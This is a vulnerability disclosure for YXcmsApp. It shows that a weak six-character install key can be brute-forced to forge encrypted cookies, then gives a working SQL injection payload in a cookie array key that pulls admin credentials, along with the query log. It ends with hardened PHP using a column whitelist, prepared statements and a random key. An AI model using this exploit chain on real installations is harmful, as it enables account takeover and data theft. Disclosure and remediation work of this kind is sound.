### Summary: rt

### Details:

YXcmsApp encrypts its cookies with the same function as dz (Discuz). Let's look at where the key comes from, in protected/apps/install/controller/indexController.php:

```
$this->randomcode= substr(md5(time()), 0, 6);
```

Hmm, only 6 characters, so it is easy to brute-force (see the test code for the PoC).

![1216a35e2ca6f0a4.jpg](https://images.seebug.org/upload/201501/151221288e2ed01c076c5b8e27f3e3f9a986a02b.jpg)

Register a user and capture the value of the yx_aut cookie from the traffic. Once the PoC has recovered the key, we can craft arbitrary cookies with the application's own encryption function.

![e52c473f115e880b.jpg](https://images.seebug.org/upload/201501/151222401f76d4ff1727af0516efe7503a28f2b1.jpg)

```
function cp_encode($data,$key='',$expire = 0) {
    $string=serialize($data);
    $ckey_length = 4;
    $key = md5($key);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = substr(md5(microtime()), -$ckey_length);
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = sprintf('%010d', $expire ? $expire + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    return $keyc.str_replace('=', '', base64_encode($result));
}
echo cp_encode("xxx",$key);
```

Next, find somewhere to inject: /protected/apps/member/controller/orderController.php

```
public function orderadd() {
    $list=get_cookie($this->auth['id'].'shopcar');
    if(!empty($list)){
        $memberconfig=appConfig('member');
        $data['ordersubject']=empty($list[1])?in($list[0]['name']):'合并付款';
        $data['ordernum']=date("YmdHis").rand(0,100);
        $data['account']=$this->auth['account'];
        $data['freighttype']=in($_POST['type']);
        $data['freightpayment']=$memberconfig['PAYMENT'];
        $data['freight']=$memberconfig['MAIL_TYPE'][in($_POST['type'])][1]; // shipping fee
        $data['receivename']=in($_POST['uname']);
        $data['receivephone']=in($_POST['phone']);
        $data['receivemobile']=in($_POST['mobile']);
        $data['receiveaddress']=in($_POST['address']);
        $data['receivezip']=in($_POST['zip']);
        $data['total']=0;
        $data['ordertime']=time();
        $data['state']=0;
        $data['mess']=in($_POST['mess']);
        foreach ($list as $value) {
            $value['ordernum']=$data['ordernum'];
            $id=model('orderDetail')->insert($value);
            if(!$id) $this->error('订单物品信息有误~');
            $data['total']+=floatval($value['price'])*intval($value['num']);
        }
```

As you can see, the cookie value is assigned to $list and then passed to insert(). insert() escapes the field values but does nothing to the array keys, which become column names. Setting $list to an array whose key is an injection payload is therefore enough to cause SQL injection.

```
$a=array(array("code`) value('1' or 1 = updatexml(1,concat(0x5c,(SELECT concat(username,0x23,password) FROM yx_admin LIMIT 1)),1))#"=>"1","name"=>"1","pric"=>"1","num"=>"1"));
echo cp_encode($a,"00e29y");
```

Modify the yx_1shopca cookie at index.php?r=member/order/orderadd and the data is extracted via the injection:

```
173 Query	INSERT INTO yx_order_detail (`code`) value('1' or 1 = updatexml(1,concat(0x5c,(SELECT concat(username,0x23,password) FROM yx_admin LIMIT 1)),1))#`,`name`,`pric`,`num`,`ordernum`) VALUES ('1','1','1','1','2015010906301335')
```

![cb8ec233dd7972dd.jpg](https://images.seebug.org/upload/201501/151228562d0ad42b8ea7c9bdfa2a90e316bec697.jpg)

### Proof of vulnerability:

![cb8ec233dd7972dd.jpg](https://images.seebug.org/upload/201501/151228562d0ad42b8ea7c9bdfa2a90e316bec697.jpg)
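A hardened version of the two weak spots above (the 6-hex-character install key and the unfiltered array keys that reach the order-detail insert), added here as an example; it is not YXcmsApp's own code. The names ORDER_DETAIL_COLUMNS, safe_order_detail_row(), build_insert() and make_randomcode() are assumed, as is PHP 7.4 or later.

```php
<?php
// Added example, not YXcmsApp code. Assumed names: ORDER_DETAIL_COLUMNS,
// safe_order_detail_row(), build_insert(), make_randomcode(). Needs PHP >= 7.4.

// The injection in the advisory lives in the array KEY, which the original
// insert() interpolates into the column list unfiltered. Allow known columns only.
const ORDER_DETAIL_COLUMNS = ['code', 'name', 'pric', 'num', 'ordernum'];

function safe_order_detail_row(array $row): array
{
    $clean = [];
    foreach ($row as $column => $value) {
        // Exact match against the whitelist; never try to "sanitize" an identifier.
        if (!in_array($column, ORDER_DETAIL_COLUMNS, true)) {
            throw new InvalidArgumentException('unexpected column in cookie data: ' . substr((string)$column, 0, 20));
        }
        $clean[$column] = is_scalar($value) ? (string)$value : '';
    }
    return $clean;
}

// Identifiers come only from the whitelist; values go through bound parameters.
function build_insert(string $table, array $row): array
{
    $columns      = implode(', ', array_map(fn($c) => "`$c`", array_keys($row)));
    $placeholders = implode(', ', array_fill(0, count($row), '?'));
    return ["INSERT INTO `$table` ($columns) VALUES ($placeholders)", array_values($row)];
}

// substr(md5(time()), 0, 6) yields 16^6 (about 16.7 million) possible keys, and
// time() is guessable from the install date. Use the CSPRNG: 16 bytes = 128 bits.
function make_randomcode(int $bytes = 16): string
{
    return bin2hex(random_bytes($bytes)); // 32 hex characters, 128 bits of entropy
}

// Demo with a constructed row shaped like the advisory's payload (key begins "code`) value(").
$tampered = ["code`) value('1' or 1=1)#" => '1', 'name' => '1', 'pric' => '1', 'num' => '1'];
try {
    safe_order_detail_row($tampered);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

$row = safe_order_detail_row(['code' => 'A1', 'name' => 'Widget', 'pric' => '9.99', 'num' => '2', 'ordernum' => '20150109063013']);
[$sql, $params] = build_insert('yx_order_detail', $row);
echo $sql, PHP_EOL;          // the SQL text contains placeholders only, no cookie data
echo make_randomcode(), PHP_EOL;
```

Use the $sql/$params pair with a prepared statement (PDO or mysqli); the whitelist is what stops the cookie-controlled key from ever reaching the column list.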